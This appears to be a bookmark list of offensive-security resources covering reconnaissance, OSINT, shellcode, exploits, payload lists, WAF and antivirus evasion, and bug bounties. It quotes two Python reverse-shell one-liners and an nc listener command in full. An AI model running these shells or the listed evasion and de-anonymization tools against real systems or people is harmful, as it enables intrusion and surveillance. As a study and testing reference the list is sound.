mitmproxy 36,838 8 days ago
Poor Man's Pentest 551 over 3 years ago : This a collection of the code that I have written for the Poor Man's Pentest presentation
Operator's Decalogue
LOTS Living Off Trusted Sites Project: Attackers are using popular legitimate domains when conducting phishing, C&C, exfiltration and downloading tools to evade detection. The list of websites below allows attackers to use their domain or subdomain
Filesec.io : Stay up-to-date with the latest file extensions being used by attackers
EMBArk 321 3 months ago : The firmware security scanning environment
EMBA 2,700 5 days ago : The security analyzer for embedded device firmware
OffensiveNim 2,840 6 months ago : My experiments in weaponizing Nim
Python Penetration Testing Cheat Sheet

CSIRT / Pentesting / Reconnaissance

Automated Reconnaissance Pipeline 428 almost 2 years ago : An automated target reconnaissance pipeline
PERFORMING DOMAIN RECONNAISSANCE USING POWERSHELL
subfinder 10,277 11 days ago is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing
urlhunter 1,512 about 1 year ago : a recon tool that allows searching on URLs that are exposed via shortener services
URLBrute 48 almost 4 years ago : Directory/Subdomain scanner developed in GoLang
degoogle 494 over 2 years ago : search Google and extract results directly. skip all the click-through links and other sketchiness
Investigator 254 about 1 year ago : An online handy-recon tool

CSIRT / Pentesting / Enumeration

linux-smart-enumeration 3,443 11 months ago : Linux enumeration tool for pentesting and CTFs with verbosity levels
Ethical Hacking Course: Enumeration Theory
Sublist3r 9,875 4 months ago : Fast subdomains enumeration tool for penetration testers
subscraper 822 5 months ago : External pentest tool that performs subdomain enumeration through various techniques. In addition, SubScraper will provide information such as HTTP & DNS lookups to aid in potential next steps
massh-enum 146 about 5 years ago : OpenSSH 7.x Mass Username Enumeration
LinEnum 7,032 about 1 year ago : Scripted Local Linux Enumeration & Privilege Escalation Checks
linpostexp 176 over 4 years ago : Linux post exploitation enumeration and exploit checking tools
Social Mapper A Social Media Enumeration & Correlation Tool
The art of subdomain enumeration 639 almost 6 years ago : This repository contains all the supplement material for the book "The art of sub-domain enumeration"
social_mapper 3,808 over 2 years ago : A Social Media Enumeration & Correlation Tool by Jacob Wilkin(Greenwolf)
LEGION 877 about 1 year ago Automatic Enumeration Tool
discover 3,444 about 2 months ago Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit
Z/OS System Enumeration Scripts 63 18 days ago : PoC REXX Script to Help with z/OS System enumeration via OMVS/TSO/JCL
WPExploitation 0 11 months ago : simple scripts to help with Windows enumeration
CTFR 1,972 11 months ago uses neither dictionary attacks nor brute force; it just abuses Certificate Transparency logs
feroxbuster 5,954 2 months ago : A fast, simple, recursive content discovery tool written in Rust
grinder 290 over 3 years ago : Python framework to automatically discover and enumerate hosts from different back-end systems (Shodan, Censys)
Admin-Scanner 157 almost 4 years ago : This tool is designed to find the admin panel of websites
Virtual host scanner 665 almost 7 years ago : A script to enumerate virtual hosts on a server
vhost-brute 84 almost 2 years ago : A PHP tool to brute force vhosts configured on a server
grab_beacon_config 446 over 3 years ago : nmap script to get beacon info
assetfinder 3,045 6 months ago : Find domains and subdomains related to a given domain

CSIRT / Pentesting / Enumeration / Wordlists:

hackerone_wordlist 0 about 1 year ago : The wordlists that have been compiled using disclosed reports at HackerOne bug bounty platform
paths wordlists
subdomains wordlists
parameters wordlists
How to Roll a Strong Password with 20-Sided Dice and Fandom-Inspired Wordlists
Assetnote Wordlists : When performing security testing against an asset, it is vital to have wordlists for content and subdomain discovery
Duplicut 881 over 2 years ago : Remove duplicates from MASSIVE wordlist, without sorting it (for dictionary-based password cracking)
Weakpass : rule-based online generator to create a wordlist based on a set of words entered by the user
A distributed password brute-force system focused on ease of use
Collection of some common wordlists such as RDP password, user name list, ssh password wordlist for brute force. IP Cameras Default Passwords. 1,548 over 2 years ago
Default IoT Username/password
Elpscrk 788 about 1 month ago : An Intelligent wordlist generator based on user profiling, permutations, and statistics. (Named after the same tool in Mr.Robot series S01E01)

CSIRT / Pentesting / Enumeration

Ghost Eye 270 about 2 years ago : Information gathering, footprinting scanner and recon tool release. Ghost Eye is an Information Gathering Tool I made in python 3. To run Ghost Eye, it only needs a domain or ip. Ghost Eye can work with any Linux distros if they support Python 3. Author: Jolanda de Koff
SuperEnum 19 about 8 years ago : This script does the basic enumeration of any open port along with screenshots
Domain Dossier : The Domain Dossier tool generates reports from public records about domain names and IP addresses to help solve problems, investigate cybercrime, or just better understand how things are set up
X41 BeanStack : Java Fingerprinting using Stack Traces
Skanuvaty 886 over 2 years ago : Dangerously fast DNS/network/port scanner
TireFire 148 11 days ago : Automate the scanning and enumeration of machines externally while maintaining complete control over scans shot to the target. Comfortable GUI-ish platform. Great for OSCP/HTB type Machines as well as penetration testing
OS Fingerprinting using NTP

CSIRT / Pentesting / WebShells

novahot 295 7 months ago : A webshell framework for penetration testers
Weevely 3,200 about 1 month ago : Weaponized web shell
Did you know that Python's simple web server can run CGI scripts
Web-Shells 167 almost 10 years ago : (mostly php)

CSIRT / Pentesting / ShellCodes

Why is My Perfectly Good Shellcode Not Working? : Cache Coherency on MIPS and ARM
shellcode2asmjs 36 over 6 years ago : Automatically generate ASM.JS JIT-Spray payloads
Shellen 891 over 3 years ago : Interactive shellcoding environment to easily craft shellcodes
C-S1lentProcess1njector : Process Injector written in C that scans for target processes, once found decrypts RC4 encrypted shellcode and injects/executes in target process' space with little CPU & Memory usage

CSIRT / Pentesting / ShellCodes / Windows:

Unicorn 3,736 10 months ago is a simple tool for using a PowerShell downgrade attack and injecting shellcode straight into memory
pe_to_shellcode 2,374 over 1 year ago : Converts PE into a shellcode
stager.dll 170 over 4 years ago : Code from this
ThreadBoat 173 4 months ago : Program uses Thread Execution Hijacking to Inject Native Shellcode into a Standard Win32 Application
Excel4-DCOM 321 over 5 years ago : PowerShell and Cobalt Strike scripts for lateral movement using Excel 4.0 / XLM macros via DCOM (direct shellcode injection in Excel.exe)
MaliciousMacroMSBuild 494 over 5 years ago : Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass
SnapLoader : Injecting shellcode into 'ntdll.dll' address space in target process, and hijacking its thread without calling GetThreadContext, evading memory scanners, and more

CSIRT / Pentesting / ShellCodes / Linux:

Linux x86 Reverse Shell Shellcode
mem-loader.asm : Fun little loader shellcode that executes an ELF in-memory using an anonymous file descriptor (inspired by

CSIRT / Pentesting / ShellCodes

Shellab : Linux and Windows shellcode enrichment utility
ShellcodeWrapper 434 almost 8 years ago : Shellcode wrapper with encryption for multiple target languages
Fully (auto) interactive TTY shells

CSIRT / Pentesting / ShellCodes / Reverse Shell:

I saw a python reverse shell, thought it looked a little long (215 chars), so I came up with my own! (107/98 ch) : listener: nc -lnvp 1234 / client (107 chars, single statement, non-blocking): python3 -c "__import__('subprocess').Popen('sh',0,None,*[__import__('socket').create_connection(('127.0.0.1',1234))]*3)"
python-pty-shells 740 over 10 years ago : Python PTY backdoors - full PTY or nothing!
Powershell HTTP/S Reverse Shell 595 3 months ago : Powershell reverse shell using HTTP/S protocol with AMSI bypass and Proxy Aware
HTTP/S Asynchronous Reverse Shell 264 about 3 years ago : (POC) Asynchronous reverse shell using the HTTP protocol
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
Reverse Shell Cheat Sheet
Reverse Shell Generator
How to Execute Shell Commands with Python
Reverse Shell to fully interactive
Single-Line Web Shell
Simple-Backdoor-One-Liner.php
reverse shell
Spawning reverse shells
Spawning interactive reverse shells with TTY
Reverse Shell Cheat Sheet
shellver 289 over 4 years ago : Reverse Shell Cheat Sheet TooL
GTRS 616 about 1 month ago : GTRS - Google Translator Reverse Shell
Using tmux for automating interactive reverse shells

CSIRT / Pentesting / ShellCodes

USING A C# SHELLCODE RUNNER AND CONFUSEREX TO BYPASS UAC WHILE EVADING AV
New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars!
Using pwntools for Binary Exploitation (pt-br)
CallObfuscator 981 almost 4 years ago : Obfuscate specific windows apis with different apis
vba-obfuscator 150 about 3 years ago : 2018 School project - PoC of malware code obfuscation in Word macros
ProcessInjection 1,076 about 1 year ago : This program is designed to demonstrate various process injection techniques
Ten process injection techniques: A technical survey of common and trending process injection techniques
shellcoding using env variables
From a C project, through assembly, to shellcode
Writing and Compiling Shellcode in C
Using ICMP to deliver shellcode
Buffer Overflow Windows - EGGHUNTER cheatsheet
metasploit, x86/alpha_mixed and Windows 7 are killing me
Some lessons learned along the way to Buffer Overflow
Windows 10 Exploit Development Setup - Vulnserver Walkthrough Part 1
Resolving API addresses in memory
Locating Kernel32 Base Address
Finding Kernel32 Base and Function Addresses in Shellcode
Basics of Windows shellcode writing
Shellcodes database for study cases
Return Oriented Programming (ROP) Attacks

CSIRT / Pentesting / ShellCodes / Gadgets:

ROPgadget Tool 3,944 about 2 months ago
RETURN ORIENTED PROGRAMMING (ROP)
ROP Gadget Prevalence and Survival under Compiler-based Binary Diversification Schemes
one_gadget 2,070 20 days ago : The best tool for finding one gadget RCE in libc.so.6
JOP ROCKET 100 3 months ago : The Jump-oriented Programming Reversing Open Cyber Knowledge Expert Tool, or JOP ROCKET, is a tool designed to help facilitate JOP gadget discovery in an x86 Windows environment

CSIRT / Pentesting / ShellCodes

A fun trick for running shellcode directly from bash
Polyglot Assembly : Writing assembly code that runs on multiple architectures
Shellcode Injection Techniques 447 about 3 years ago : A collection of C# shellcode injection techniques. All techniques use an AES encrypted meterpreter payload. I will be building this project up as I learn, discover or develop more techniques. Some techniques are better than others at bypassing AV
Simple Shellcode Tale!
Linux x86 execve("/bin/sh") - 28 bytes
ShellCode Tester 90 16 days ago : An application to test windows and linux shellcodes
Windows/x86 Dynamic Bind Shell / Null-Free Shellcode
Core 43 about 3 years ago : Core bypass Windows Defender and execute any binary converted to shellcode
Finding a function's address dynamically. Analysis of the block_api library (pt-br)
Ninja UUID Shellcode Runner 433 over 1 year ago : Module Stomping, No New Thread, HellsGate syscaller, UUID Shellcode Runner for x64 Windows 10!
IPFuscator 352 10 months ago : A tool to automatically generate alternative IP representations
Shellcode Mutator 233 almost 2 years ago : Mutate nasm assembly source files using no-instruction sets (such as nops) to avoid signatures

CSIRT / Pentesting / Reporting

public-pentesting-reports 8,498 6 months ago : Curated list of public penetration test reports released by several consulting firms and academic security groups
report-ng 66 10 months ago : Generate MS Word template-based reports with HP WebInspect / Burp Suite Pro input, own custom data and knowledge base
PandocPentestReport 10 about 5 years ago : This repository shows my effort to create a pandoc based pentest report template
Technical Report template 2 over 9 years ago : LaTeX template for technical reports
TryHackMe. Breaking Into the Kenobi Machine.
PwnDoc : is a pentest reporting application making it simple and easy to write your findings and generate a customizable Docx report
This is how you can deliver true value through your pentest reports
Offensive Security Exam Report Template in Markdown 3,558 21 days ago : Markdown Templates for Offensive Security OSCP, OSWE, OSCE, OSEE, OSWP exam report
A List of Post-mortems! 11,309 4 months ago : A collection of postmortems. Sorry for the delay in merging PRs!

CSIRT / Pentesting / OSINT - Open Source INTelligence

Slides from my ShellCon Talk, OSINT for Pen Tests, given 10/19. 61 almost 7 years ago
OSINT tool for visualizing relationships between domains, IPs and email addresses.
sn0int 2,058 about 2 months ago : Semi-automatic OSINT framework and package manager
OSINT – Passive Recon and Discovery of Assets: A Pentester’s Guide – Part 1
OSINT – LinkedIn is Not Just for Jobs: A Pentester’s Guide – Part 2
iKy : I Know You (OSINT project)
Gitrob 5,938 about 2 years ago : Putting the Open Source in OSINT
OSint Tools : On this page you’ll find tools that can help you do your OSINT research
datasploit 3,032 over 4 years ago : An #OSINT Framework to perform various recon techniques on Companies, People, Phone Number, Bitcoin Addresses, etc., aggregate all the raw data, and give data in multiple formats
the-endorser 327 over 3 years ago : An OSINT tool that allows you to draw out relationships between people on LinkedIn via endorsements/skills
OSINT-y Goodness : HathiTrust Digital Library
OSINT Resources for 2019
Awesome OSINT 19,100 12 days ago : 😱 A curated list of amazingly awesome OSINT
Directory of Open Access Journals : OSINT-y Goodness, №14
Identifying A Pro-Indonesian Propaganda Bot Network Twitter Analysis:
TWINT 15,833 over 1 year ago : An advanced Twitter scraping & OSINT tool written in Python that doesn't use Twitter's API, allowing you to scrape a user's followers, following, Tweets and more while evading most API limitations
Breaking Mimblewimble’s Privacy Model : Mimblewimble’s privacy is fundamentally flawed. Using only $60/week of AWS spend, I was able to uncover the exact addresses of senders and recipients for 96% of Grin transactions in real time
snscrape 4,490 about 1 year ago : A social networking service scraper in Python
ꓘamerka GUI : Hack the planet with ꓘamerka GUI, the ultimate Internet of Things/Industrial Control Systems reconnaissance tool. ICS/IoT search:
dmi-tcat 367 16 days ago /Digital Methods Initiative - Twitter Capture and Analysis Toolset
KnockKnock 181 over 1 year ago : A simple reverse whois lookup CLI which allows you to find domain names owned by an individual person or company, often used for Open Source Intelligence (OSINT) purposes
From email to phone number, a new OSINT approach
recox 318 6 months ago : Master script for web reconnaissance
openSquat 729 4 months ago is an open source intelligence (OSINT) R&D project to identify cyber squatting threats to specific companies or domains, such as domain squatting, typo squatting, IDN homograph attacks, phishing and scams
Trace Labs Kali Linux build configuration 680 over 1 year ago :
natlas 626 4 months ago : Scaling Network Scanning. Changes prior to 1.0 may cause difficult to avoid backwards incompatibilities. You've been warned
sifter : is an OSINT, recon & vulnerability scanner. It combines a plethora of tools within different module sets in order to quickly perform recon tasks, check network firewalling, enumerate remote and local hosts, and scan for the 'blue' vulnerabilities within Microsoft products and, if unpatched, exploit them
Kitsune 242 over 2 years ago : An artificial neural network to detect automated Twitter accounts (bots)
Image "Cloaking" for Personal Privacy
OSINT-Brazuca 1,636 about 2 months ago (pt-br) : Repository created to gather information, sources (websites/portals) and OSINT tricks within the Brazilian context
WhatsMyName : This tool allows you to enumerate usernames across many websites

CSIRT / Pentesting / OSINT - Open Source INTelligence / WhatsMyName

Maltego Transforms for WhatsMyName 63 over 1 year ago

CSIRT / Pentesting / OSINT - Open Source INTelligence

shadowbanned : Shadowban Tester for Twitter
sherlock 60,468 8 days ago : Hunt down social media accounts by username across social networks
usufy 7 almost 10 years ago is a GPLv3+ piece of software that checks whether a profile exists for a given user on a bunch of different platforms. It uses the error messages most platforms display when a user profile is not found as evidence for the existence or non-existence of a given profile
osrf 928 7 months ago : OSRFramework, the Open Sources Research Framework, is an AGPLv3+ project by i3visio focused on providing an API and tools to perform more accurate online research
IntelMQ : A tool-suite solution for IT security teams (CERTs & CSIRTs, SOCs, abuse departments, etc.) for collecting and processing security feeds using a message queuing protocol. Its main goal is to give incident responders an easy way to collect & process threat intelligence, thus improving the incident handling processes of CERTs
OSINT SAN Framework. (ru) : OSINT-SAN Framework makes it possible to quickly find information and de-anonymize Internet users. The software is a framework that contains 30 functions for searching information or de-anonymizing users. With the help of my software, you can collect information about users on the Internet, anonymously and without special skills
Scrummage 512 about 1 year ago : The Ultimate OSINT and Threat Hunting Framework
viper 3,745 about 2 months ago : Intranet pentesting tool with webui (open-source graphical intranet penetration tool)
⡷⠂𝚔𝚊𝚛𝚖𝚊 𝚟𝟸⠐⢾ 815 5 months ago is a Passive Open Source Intelligence (OSINT) Automated Reconnaissance (framework)
3WiFi : Free Wireless Database
Stealth plane in flight
ExportData : Twitter data export tool. Allows downloading historical tweets since 2006, exporting followers & followings, and collects historical trends in 467 locations
DetectDee 1,289 about 1 year ago : Hunt down social media accounts by username, email or phone across social networks
OSINT framework focused on gathering information from free tools or resources
h8mail 4,187 over 1 year ago : Password Breach Hunting & Email OSINT tool, locally or using premium services. Supports chasing down related email
PwnBin 427 about 3 years ago : Python Pastebin Webcrawler that returns list of public pastebins containing keywords
ODBParser : OSINT tool to search, parse and dump only the open Elasticsearch and MongoDB directories
pastego 97 almost 3 years ago : Scrape/Parse Pastebin using GO and expression grammar (PEG)
Instagram Scraper : Scrapes an instagram user's photos and videos
galer 253 10 days ago : A fast tool to fetch URLs from HTML attributes by crawl-in
How to bypass CloudFlare bot protection ?
SpyScrap 169 12 months ago : CLI and GUI for OSINT. Are you very exposed on the Internet? Check it! Twitter, Tinder, Facebook, Google, Yandex, BOE. It uses facial recognition to provide more accurate results
pwnedOrNot 2,239 about 1 year ago : OSINT Tool for Finding Passwords of Compromised Email Addresses
dorking (how to find anything on the Internet)
Complete Google Dorks List in 2020 For Ethical Hacking and Penetration Testing
The closer a username/email address resembles other usernames/email addresses associated with a target, the easier it is to find (or guess and/or 'bruteforce') other usernames/email addresses associated with that target.
DorkGenius : Generate custom dorks for Google, Bing, DuckDuckGo, & more!
chatter 146 over 1 year ago : internet monitoring osint telegram bot for windows
Slackhound 74 9 months ago : Slackhound allows red and blue teams to perform fast reconnaissance on Slack workspaces/organizations to quickly search user profiles, locations, files, and other objects
ail-feeder-telegram 13 10 days ago : External telegram feeder for AIL framework
MODIFYING TELEGRAM'S "PEOPLE NEARBY" FEATURE TO PINPOINT PEOPLE'S HOMES
signald : unofficial daemon for interacting with Signal
Telegram messenger CLI 386 over 2 years ago : for Telegram IM
TelegramScraper 42 about 4 years ago : Telegram scraping tool for researching mis-/disinformation and investigating shady goings-on
OSINT-Discord-resources 347 8 months ago : Some OSINT Discord resources

CSIRT / Pentesting / Vulnerability

Striker 2,234 over 1 year ago is an offensive information and vulnerability scanner
SQL Vulnerability Scanner 975 almost 7 years ago
Decentralized Application Security Project
Introduction to IDAPython for Vulnerability Hunting — Somerset Recon
Beating the OWASP Benchmark
CMSScan 964 over 3 years ago : Scan Wordpress, Drupal, Joomla, vBulletin websites for Security issues
Meteor Blind NoSQL Injection
Security Bulletins that relate to Netflix Open Source 742 about 2 months ago
tsunami-security-scanner 8,274 2 months ago : Tsunami is a general purpose network security scanner with an extensible plugin system for detecting high severity vulnerabilities with high confidence
Testing docker CVE scanners. Part 2.5 — Exploiting CVE scanners
New NAT/Firewall Bypass Attack Lets Hackers Access Any TCP/UDP Service : allows an attacker to remotely access any TCP/UDP service bound to a victim machine, bypassing the victim’s NAT/firewall, just by having the victim visit a website. Video:
openVulnQuery 29 over 1 year ago : A Python-based client for the Cisco openVuln API
HellRaiser 562 over 1 year ago : Vulnerability Scanner
Open-Source Vulnerability Intelligence Center : Vulnerability Intelligence Center / Exploits
Vagrant GVM/Openvas 4 over 3 years ago : GVM/Openvas vulnerability scanner in Alpine with Vagrant
How to Have a Cybersecurity Graph Database on Your PC
On the Security Vulnerabilities of Text-to-SQL Models

CSIRT / Pentesting / WAFs

Web Application Penetration Testing Course URLs
Web Application Penetration Testing Notes
quarantyne 119 over 2 years ago : Modern Web Firewall: stop account takeovers, weak passwords, cloud IPs, DoS attacks, disposable emails
Sitadel 554 12 months ago : Web Application Security Scanner
WAF through the eyes of hackers
Some nice payloads to bypass XSS WAF :
Some MySQL tricks to break some #WAFs out there.
another one :
bypassing modern web application firewalls
WAFW00F 5,296 about 2 months ago allows one to identify and fingerprint Web Application Firewall (WAF) products protecting a website
Bypassing Cloudflare WAF with the origin server IP address
WAF-Hook 5 8 months ago

CSIRT / Pentesting / WAFs / How to find real IP of a site behind cloudflare

Cloudfail tool
Shadowcrypt Cloudflare resolve
Behindflare tool 15 almost 2 years ago
Wordpress technique

CSIRT / Pentesting / WAFs

A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection

CSIRT / Pentesting / Exploits

IOSurface exploit 218 5 months ago
Attacking a co-hosted VM: A hacker, a hammer and two memory modules
How To Create a Metasploit Module
Installing Metasploit Pro, Ultimate, Express, and Community
unfurl 60 almost 7 years ago
A collection of vulnerable ARM binaries for practicing exploit development 898 about 3 years ago
A collection of PHP exploit scripts 838 9 months ago
Sage ACF Blocks 37 6 months ago : A Sage 10 helper package for building ACF blocks rendered using blade templates
WebKit exploit 749 over 3 years ago
Modern Binary Exploitation - Spring 2015
Python 2 vs 3 for Binary Exploitation Scripts (video)
DriveCrypt : DriveCrypt Dcr.sys vulnerability exploit
Faxploit : Sending Fax Back to the Dark Ages
beebug 210 over 5 years ago : A tool for checking exploitability
NAVEX : Precise and scalable exploit generation for dynamic web applications
Three New DDE Obfuscation Methods
SILENTTRINITY 2,196 12 months ago : A post-exploitation agent powered by Python, IronPython, C#/.NET
fuxploider 3,050 over 1 year ago : File upload vulnerability scanner and exploitation tool
Jailbreaks Demystified – GeoSn0w – Programmer. Hacking stuff
Attacking Google Authenticator
Pacu 4,391 8 days ago : The AWS exploitation framework, designed for testing the security of Amazon Web Services environments

CSIRT / Pentesting / Exploits / Glibc Heap Exploitation Basics:

Introduction to ptmalloc2 internals (Part 1)
ptmalloc2 internals (Part 2) Fast Bins and First Fit Redirection

CSIRT / Pentesting / Exploits

movfuscator 9,461 6 months ago : The single instruction C compiler
beebug 210 over 5 years ago : A tool for checking exploitability
UEFI vulnerabilities classification focused on BIOS implant delivery and
MikroTik Firewall & NAT Bypass
3D Accelerated Exploitation 54 over 5 years ago : The content of this repository is meant to be the official release of the tooling/exploit that was discussed during the OffensiveCon 2019 talk - 3D Accelerated Exploitation. The talk dealt with research into the VirtualBox 3D Acceleration feature, which is backed by a software component called Chromium
GhostDelivery : Python script to generate obfuscated .vbs script that delivers payload (payload dropper) with persistence and windows antivirus disabling functions
Beat the hole in the ATM : hacking a Diebold ATM
RedGhost 536 over 3 years ago : Linux post exploitation framework designed to assist red teams in gaining persistence, reconnaissance and leaving no trace
PowerSploit 11,918 over 4 years ago : is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment
Z-Shave. Exploiting Z-Wave downgrade attacks
Totally Pwning the Tapplock Smart Lock Andrew Tierney 13 Jun 2018
I found myself in need of a much shorter python reverse oneliner than shellpop provides by default. Here's what I landed on. 🙃 : python -c "import pty,socket;h,p='192.168.200.1',12345;socket.create_connection((h,p));pty.spawn('/bin/sh');"
The Art of WebKit Exploitation
PEASS 16,117 21 days ago : Privilege Escalation Awesome Scripts SUITE
Patchless AMSI bypass using SharpBlock

CSIRT / Pentesting / Exploits / Patchless AMSI bypass using SharpBlock

Lets Create An EDR… And Bypass It! Part 1
Lets Create An EDR… And Bypass It! Part 2
SharpBlock 1,114 over 3 years ago : A method of bypassing EDR's active protection DLLs by preventing entry point execution ; Simple EDR implementation to demonstrate bypass

CSIRT / Pentesting / Exploits

Bypassing Antivirus with Golang – Gopher it!
The Invoke-CradleCrafter Overview
DVS 197 about 4 years ago : D(COM) V(ulnerability) S(canner) AKA Devious swiss army knife - Lateral movement using DCOM Objects
The Exploit Database Git Repository 7,738 about 2 years ago
Vulnerability Lab : helps with the world's first independent bug bounty hacker community. Leverage their skills and creativity to surface your critical vulnerabilities before criminals can exploit them
0day.Today : Biggest Exploits Database and 0day market - The Underground, is one of the world's most popular and comprehensive computer security web sites
cxsecurity : is an open project developed and moderated fully by one independent person
Security Focus
Exploit Files (Packet Storm):
Graphology of an Exploit : Hunting for exploits by looking for the author’s fingerprints
Traditional Buffer Overflow Windows cheatsheet
Exploit writing tutorial part 3 : SEH Based Exploits
Vulnerability DB : Detailed information and remediation guidance for known vulnerabilities
mssqlproxy 724 almost 4 years ago is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse
Script to decode .vbe files
A First Introduction to System Exploitation
AllPocsFromHackerOne 874 almost 2 years ago : This script grabs public reports from HackerOne and downloads all JSON files so they are grepable
How I Found My First Ever ZeroDay (In RDP)
Learning Linux Kernel Exploitation - Part 1
SharpSelfDelete 147 about 3 years ago : C# implementation of the research by @jonaslyk and the drafted PoC from @LloydLabs
preeny 1,574 7 months ago : Some helpful preload libraries for pwning stuff
Exploits, Vulnerabilities and Payloads: Practical Introduction
Beginners Guide to 0day/CVE AppSec Research
0days In-The-Wild Hello! This site aims to be a central repository for information about 0-days exploited in-the-wild! It's maintained by Google Project Zero
Sticky notes for pentesting.

CSIRT / Pentesting / Payloads

Payloads Collection by @alra3ees:

CSIRT / Pentesting / Payloads / Payloads Collection

Command Injection Payload List 3,006 4 months ago
Cross Site Scripting (XSS) Vulnerability Payload List 6,366 4 months ago
XML External Entity (XXE) Injection Payload List 1,097 4 months ago : XML External Entity (XXE) Injection Payload List
SQL Injection Payload List 5,000 4 months ago : SQL Injection Payload List
RFI/LFI Payload List 538 4 months ago
Open Redirect Payload List 533 4 months ago

CSIRT / Pentesting / Payloads / MSFVenom:

Creating Reverse Shell Payloads with MSFVenom (pt-br)
MSFVenom Reverse Shell Payload Cheatsheet (with & without Meterpreter)
MSFVenom - CheatSheet
Hiding Metasploit Shellcode to Evade Windows Defender
Creating Metasploit Payloads
Shikata Ga Nai Encoder Still Going Strong
BYPASSING ANTIVIRUS WITH MSFVENOM
MSFVenom Cheatsheet

CSIRT / Pentesting / Payloads

Payload Delivery for DevOps : Building a Cross-Platform Dropper Using the Genesis Framework, Metasploit and Docker
LaTeX Injection 61,337 9 days ago
Hiding malicious code with “Module Stomping”: Part 1
Phantom-Evasion 1,392 about 1 year ago : Python antivirus evasion tool
Steganography 572 about 1 month ago : Least Significant Bit Steganography for bitmap images (.bmp and .png), WAV sound files, and byte sequences. Simple LSB Steganalysis (LSB extraction) for bitmap images
PyFuscation 510 almost 2 years ago : Obfuscate powershell scripts by replacing Function names, Variables and Parameters
Starting a handler with Metasploit
Reverse Shell Cheat Sheet
System Calls 107 about 3 years ago : An example of using Syscalls in C# to get a meterpreter shell
Awesome one-liner bug bounty
bbrecon 219 over 3 years ago : Python library and CLI for the Bug Bounty Recon API
RPC Bug Hunting Case Studies – Part 1
Top Penetration Testing & Bug Hunting YouTube Channels you should follow Updated 11/19/2020
Our top tips for better bug bounty reports, plus a hacker contest!
axiom 4,058 about 2 months ago : The dynamic infrastructure framework for anybody!
KindleDrip : From Your Kindle’s Email Address to Using Your Credit Card
Amazon Kindle Vulnerabilities Could Have Led Threat Actors to Device Control and Information Theft
How I Might Have Hacked Any Microsoft Account
BugBountyScanner 874 11 months ago : A Bash script and Docker image for Bug Bounty reconnaissance. Intended for headless use
alert() is dead, long live print()
Bug Bounty Reconnaissance Framework (BBRF) 295 5 days ago : can help you coordinate your reconnaissance workflows across multiple devices
If you do use BBRF, here is an initial script to use the HackerOne API to gather all programs' scope, including your private programs.
KeyHacks 5,099 3 months ago is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid
NotKeyHacks is the opposite of the KeyHacks repository by @streaak. Sensitive tokens are fun, but a lot of time is wasted reading documentation only to figure out that the token you found named AppSecret is, somehow, not sensitive at all and meant to be public. This repository is meant to be an inventory of those tokens that look potentially sensitive but aren't so that we can just CTRL-F and save a lot of time
Two Rights Might Make A Wrong
You always hear stories about how bug bounty programs steal your bug, but very few people post about it, or have the 100% proof to show this.
OOB reads in network message handlers lead to RCE
Bug Bounty Resources
Google Bug Hunters Welcome to Google's Bug Hunting community
0-Day Hunting (Chaining Bugs/Methodology)
KingOfBugBounty Project 4,234 4 months ago : Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters
awesome-web-hacking 5,875 1 day ago : A list of web application security
gau 4,000 25 days ago : Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl
malvun is the first website exclusively dedicated to the research of security vulnerabilities within Malware itself
Introducing CookieMonster : a tool for breaking stateless authentication
get-title 2,148 about 1 year ago
Insecure Direct Object References 61,337 9 days ago
bugbounty-cheatsheet 5,938 about 1 year ago : A list of interesting payloads, tips and tricks for bug bounty hunters
Awesome Bug Bounty 4,668 10 months ago : A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups
ParamSpider 2,527 5 months ago : Mining parameters from dark corners of Web Archives
Server Side Request Forgery 61,337 9 days ago
CRLF 5,938 about 1 year ago
CRLF Injection 61,337 9 days ago
crlf-injector 46 over 2 years ago : A CRLF ( Carriage Return Line Feed ) Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL
CRLF Bruter 10 over 3 years ago : A simple tool to test for CRLF injection
CSV-Injection 5,938 about 1 year ago
CSV Injection 61,337 9 days ago
Command Injection 61,337 9 days ago
Directory Traversal 61,337 9 days ago
$4,000 Starbucks secondary context path traversal
LFI 5,938 about 1 year ago
kadimus 514 over 4 years ago : kadimus is a tool to check and exploit LFI vulnerabilities
fimap : is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps
File Inclusion 61,337 9 days ago
Open-Redirect 5,938 about 1 year ago
RCE 5,938 about 1 year ago
Crypto 5,938 about 1 year ago
Template Injection 5,938 about 1 year ago
SSTI 61,337 9 days ago
XSLT 5,938 about 1 year ago
Content Injection 5,938 about 1 year ago
LDAP Injection 61,337 9 days ago
NoSQL Injection 61,337 9 days ago
IDOR 61,337 9 days ago
ISCM 61,337 9 days ago
OAuth 61,337 9 days ago
XPATH Injection 61,337 9 days ago
Bypass Upload Tricky 61,337 9 days ago
Web Security CheatSheet
Presenting The Pwning-Machine, a versatile and easy to setup Bug bounty environment.
Zeus-Scanner 959 about 1 year ago : is an advanced reconnaissance utility designed to make web application reconnaissance simple. Zeus comes complete with a powerful built-in URL parsing engine, multiple search engine compatibility, the ability to extract URLs from both ban and webcache URLs, the ability to run multiple vulnerability assessments on the target, and is able to bypass search engine captchas

CSIRT / Pentesting / Payloads / SQL Injection:

SQL injection
SQL Injection
Blind SQL injection
Dangerous Injections
Blind SQL Injection at fasteditor.hema.com
SQL Injection 101: How to Fingerprint Databases & Perform General Reconnaissance for a More Successful Attack
SQL injection cheat sheet
SQL Injection Cheat Sheet
The Ultimate SQL Injection Cheat Sheet
Examining the database in SQL injection attacks
Dumping a complete database using SQL injection
SQLi 5,938 about 1 year ago
SleuthQL : A SQL Injection Discovery Tool
Postgres SQL Injection Cheat Sheet
From SQL Injection to Shell: PostgreSQL edition
Pentesting PostgreSQL with SQL Injections
SQLite Injection 61,337 9 days ago
